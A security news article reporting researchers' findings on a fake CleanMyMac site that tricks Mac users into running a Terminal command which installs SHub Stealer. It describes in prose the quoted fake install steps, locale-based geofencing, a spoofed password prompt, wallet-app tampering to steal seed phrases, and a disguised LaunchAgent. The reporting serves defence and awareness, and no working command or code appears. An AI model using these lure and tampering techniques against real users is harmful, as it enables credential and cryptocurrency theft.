Mac users looking for a reliable system cleanup tool are being lured into a malware trap. Cyber security researchers have spotted a fraudulent website impersonating the well-known macOS utility CleanMyMac, tricking visitors into installing a credential-stealing malware called SHub Stealer that can also tamper with cryptocurrency wallet applications.
A Fake Installer That Asks Users to Run a Terminal Command
The campaign relies on social engineering in which victims are asked to run a command in Terminal, which installs the malware while appearing like a legitimate installation step. This is a classic example of a ClickFix attack on macOS devices, where attackers trick users into manually executing a command that downloads and runs the malicious payload.
Press Command (⌘) + Space to open Spotlight Search
Type "Terminal" and Press Return to launch it
Once the Terminal window is open, you can proceed with the steps below
Installation via Terminal command
Copy the installation command above.
Open the terminal on your device and paste the command, then press the "Return" button.
Enter your device password and confirm the installation.
According to Malwarebytes’ blog post, once executed, the command begins displaying a message referencing the legitimate CleanMyMac website, giving the impression that the installation is proceeding normally. In reality, it decodes a hidden link and downloads a script from a remote server that runs immediately. Since the user executes the command themselves, macOS protection like Gatekeeper is bypassed.
The Malware Doesn’t Target Russian Devices
After the initial script runs, the malware performs several checks before continuing. One of the first is a keyboard language test that looks for Russian-language layouts. If such a layout is detected, the program exits immediately and reports a blocked event to the attacker’s server.
This form of geofencing is frequently seen in malware linked to Russian-speaking cybercrime groups. By avoiding machines likely located in Russia or neighboring countries, operators reduce the chance of attracting attention from local authorities.
If the system passes these checks, the malware sends system information to a command-and-control server. The transmitted data includes the device’s external IP address, hostname, macOS version, and keyboard locale, along with a unique identifier used to track each infected machine.
Password Harvesting and Stealing Crypto
The next phase focuses on gaining deeper access to the system. The malware downloads an AppleScript payload that closes the Terminal window and displays a password prompt designed to mimic a legitimate macOS dialog box.
The prompt asks the user to enter their system password, claiming that “System Preferences” requires authentication. While the message includes a grammatical mistake, many users may still enter their credentials without noticing.
If the password is entered, the malware verifies it using macOS system tools and can retry up to ten times until a valid password is obtained. With the correct password, the attacker gains access to the macOS Keychain, which stores saved passwords, Wi-Fi credentials, application tokens, and private keys.
Other than collecting credentials and browser data, SHub Stealer also interferes with cryptocurrency wallet applications. Researchers observed the malware modifying several popular wallets, including Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite.
These modifications allow attackers to display fake recovery or security prompts inside the wallet interface. Victims may see a message asking them to enter their recovery seed phrase for verification or security updates. Once entered, the seed phrase is transmitted to a remote endpoint controlled by the attackers, allowing them to fully access and drain the victim’s crypto funds.
Persistence Hidden Behind a Google-Like Update Service
To remain active on the infected Mac, SHub installs a persistent background task using a LaunchAgent. The file name mimics Google’s legitimate Keystone updater and is configured to run every minute. Each execution launches a hidden script that maintains communication with the command-and-control infrastructure, allowing attackers to issue additional commands or collect more data over time.
Researchers believe that the consistency of infrastructure throughout the modified wallet apps, including shared API endpoints and identifiers, suggests the operation is controlled by a single actor using a centralized backend system.
macOS Malware Activity Is Increasing
The campaign is one of several recent attacks aimed at macOS users. In recent months, researchers have reported several campaigns targeting Apple users with credential-stealing malware. One campaign involved Python-based infostealers disguised as installers for artificial intelligence tools, designed to steal browser sessions and saved credentials from Mac systems.
Another operation used fake invitations to a popular tech podcast as bait to distribute the AMOS infostealer, which also targeted crypto wallets. More recently, researchers uncovered malicious add-ons disguised as legitimate extensions for the OpenClaw project, again aimed at stealing cryptocurrency assets from macOS users.
Taken together, these incidents show how attackers are increasingly targeting macOS for cryptocurrency and browser credentials. Therefore, download software only from the official developer site or the Mac App Store, and avoid running commands from unfamiliar websites.
Waqas
